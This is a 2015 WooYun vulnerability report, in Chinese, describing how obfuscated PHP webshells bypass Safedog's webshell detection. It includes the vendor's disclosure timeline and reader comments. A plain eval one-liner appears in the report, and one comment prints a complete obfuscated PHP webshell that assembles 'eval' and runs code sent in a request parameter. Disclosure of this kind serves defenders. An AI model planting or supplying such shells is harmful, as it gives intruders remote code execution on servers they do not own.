安全狗(网站安全狗|服务器安全狗)最新版绕过webshell检测

漏洞概要

缺陷编号:WooYun-2015-0102582

漏洞标题:安全狗(网站安全狗|服务器安全狗)最新版绕过webshell检测

相关厂商:安全狗

漏洞作者:路人甲

提交时间:2015-03-26 14:31

公开时间:2015-06-29 14:32

漏洞类型:非授权访问/认证绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

webshell检测绕过

详细说明:

1.一句话木马,单纯用<?php eval($_POST[1])?>这种方式肯定会被检测到,我们采用这种方式:

结果发现未被检测到

2.大马,两种:一个是DarkShell.php,另外一个是采用base64+gzinflate压缩编码,大马文件如下:

解密脚本网上看到一个,但是感觉不给力,自己改了下:

解密后的大马文件:

漏洞证明:

利用大马可以执行命令,上传文件:

如果权限够高(Administrator以上)还能kill掉网站安全狗和服务器安全狗,命令如下:

修复方案:

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-2914:32

厂商回复:

漏洞Rank:9 (WooYun评价)

最新状态:

2015-03-31:特征已经更新

评价

  1. 2010-01-01 00:00 子非海绵宝宝 白帽子 | Rank:1220 漏洞数:113)

    以后拿站是越来越难了

  2. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    以后拿站是越来越难了

  3. 2010-01-01 00:00 鬼魅羊羔 白帽子 | Rank:274 漏洞数:36)

    以后拿站是越来越难了

  4. 2010-01-01 00:00 千江雪 白帽子 | Rank:0 漏洞数:0)

    一个洞出来,堵死了牛多人的路,不好混了。

  5. 2010-01-01 00:00 black4yl 白帽子 | Rank:0 漏洞数:0)

    这种的就不要报了吧,都不容易

  6. 2010-01-01 00:00 ssss 白帽子 | Rank:41 漏洞数:4)

    哎呀。

  7. 2010-01-01 00:00 a6c 白帽子 | Rank:10 漏洞数:2)

    有想砍洞主的,下面报名组队了,众筹

  8. 2010-01-01 00:00 哈兹本德 白帽子 | Rank:10 漏洞数:1)

    赚钱真难

  9. 2010-01-01 00:00 zhxs 白帽子 | Rank:25 漏洞数:2)

    赚钱真难

  10. 2010-01-01 00:00 子非海绵宝宝 白帽子 | Rank:1220 漏洞数:113)

    忽略了还更新的特征 哈哈 看你们还交

  11. 2010-01-01 00:00 炊烟 白帽子 | Rank:115 漏洞数:10)

    忽略了还更新特征 哈哈 看你们以后还提交

  12. 2010-01-01 00:00 好基友一辈子 白帽子 | Rank:25 漏洞数:3)

    赚钱真容易,明明是公开的方法洞主拿来小赚一笔,真好

  13. 2010-01-01 00:00 phith0n 白帽子 | Rank:644 漏洞数:62)

    这一句话能执行?这也能过,还能补rank……醉了
    <?php
    $jm='MQ==';
    $s=base64_decode($jm);
    $a="e"./*-/*-*/"v"./*-/*-*/"a"./*-/*-*/"l";
    $b=base64_encode($a);
    $c=base64_decode($b);
    $c($_REQUEST[$s]);
    ?>

  14. 2010-01-01 00:00 HackBraid 白帽子 | Rank:1006 漏洞数:95)

    @phith0n 一句话是不被检测到,大马是执行,呵呵

  15. 2010-01-01 00:00 Mr.R 白帽子 | Rank:0 漏洞数:0)

    喂喂喂。 洞主 你不能这样 缺wb 我们一人给你一个。